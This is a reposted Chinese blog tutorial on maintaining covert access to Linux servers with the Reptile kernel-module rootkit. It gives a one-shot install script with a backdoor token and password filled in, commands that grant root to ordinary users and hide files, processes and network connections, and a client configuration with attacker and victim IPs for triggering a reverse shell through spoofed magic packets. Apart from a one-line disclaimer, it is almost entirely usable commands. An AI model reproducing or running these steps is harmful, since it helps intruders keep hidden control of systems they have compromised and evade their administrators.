权限维持-Linux-内核加载 LKM-Rootkit 后门

news2024/9/21 0:39:02

免责声明:本文仅做技术交流与学习...

项目地址:

安装:

隐藏用法:

将 root 权限授予非特权用户

隐藏文件、目录和内核模块

隐藏进程

隐藏 TCP 和 UDP 连接

高级玩法(c/s)

攻击机上(客户端)安装:

设置连接配置

权限维持-Linux-内核加载 LKM-Rootkit 后门

现在常用的linux维持权限的方法大多用crontab和开机自启动，同时使用的大多是msf或者其它的tcp连接来反弹shell，这种做法比较容易被管理员发现。 所以我们想有一个非tcp连接、流量不容易被怀疑的后门，并且在大量的shell的场景下，可以管shell，Reptile刚好是种LKM rootkit，因此具有很好的隐藏性和强大的功能。

项目地址:

GitHub - f0rb1dd3n/Reptile: LKM Linux rootkit

建议在其测试成功的版本型号上去安装

本文演示的为centos7 Cent0S7.764位 --------->

安装:

1-本地从项目下载好zip,然后解压,将解压后的文件放到centos的~目录,

2-在centos终端~目录创建s.sh,内容为:

centos自动化一键安装搭建------->

$kernel=`uname -r`
yum -y install perl vim gcc make g++ unzip
yum -y localinstall kernel-devel-"$kernal".rpm
cd Reptile-2.0/ && chmod +x ./setup.sh
./setup.sh install <<EOF
reptile
hax0r   
s3cr3t  
reptile
666
y
服务器IP   
端口          
1
EOF

--成功--

隐藏用法:

这里我们在自动化部署的时候隐藏了此目录(reptile),所以直接盲打就行.

将 root 权限授予非特权用户

/reptile/reptile_cmd root

隐藏文件、目录和内核模块

/reptile/reptile_cmd hide
/reptile/reptile_cmd show
============================
隐藏文件：文件名中带reptile的都会被隐藏.
mkdir reptile_xiaodi
mkdir reptile_file
看不到,但是可以cd进去.
ls -l
cd reptile_xiaodi

隐藏进程

/reptile/reptile_cmd hide <pid>
/reptile/reptile_cmd show <pid>
===================================
隐藏进程：/reptile/reptile_cmd hide
显示进程：/reptile/reptile_cmd show 

nohup ping 114.114.114.114 &
ps -ef | grep ping | grep -v grep
/reptile/reptile_cmd hide 4774
ps -ef | grep ping | grep -v grep

隐藏 TCP 和 UDP 连接

/reptile/reptile_cmd conn <IP> hide

/reptile/reptile_cmd conn <IP> show
=========
隐藏连接：/reptile/reptile_cmd udp hide
显示连接：/reptile/reptile_cmd tcp show
netstat -anpt | grep 1100.100.45.106
/reptile/reptile_cmd tcp 100.100.45.106 443 hide
/reptile/reptile_cmd tcp 100.100.45.106 443 show

外连地址+端口:

隐藏IP进程:

高级玩法(c/s)

攻击机上(客户端)安装:

./setup.sh client
--进入bin目录,  启动~客户端终端
help
show

设置连接配置

LHOST       47.94.236.117       Local host to receive the shell
LPORT       4444    Local       port to receive the shell
SRCHOST     47.94.236.117       Source host on magic packets (spoof)
SRCPORT     666                 Source port on magic packets (only for TCP/UDP)
RHOST       121.43.154.113      Remote host(受害主机IP)
RPORT       22                  Remote port (only for TCP/UDP)  --冒充ssh协议的端口,封装(类似进程注入)
PROT        TCP                 Protocol to send magic packet (ICMP/TCP/UDP)
PASS        s3cr3t              Backdoor password (optional)
TOKEN       hax0r               Token to trigger the shell


----这里的配置都要指向靶机安装的!!!!!!

set xxx xxxxxx
===============
LHOST47.94.236.117Local host to receive the shell
LPORT4444Local port to receive the shell
SRCHOST47.94.236.117Source host on magic packets (spoof)
SRCPORT666Source port on magic packets(only for TCP/UDP)
RHOST121.43.154.113Remote host
RPORT22Remote port (only for TCP/UDP)
PROTTCPProtocol to send magic packet (ICMP/TCP/UDP)
PASSs3cr3tBackdoor password (optional)
TOKENhax0rToken to trigger the shell

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/1907436.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！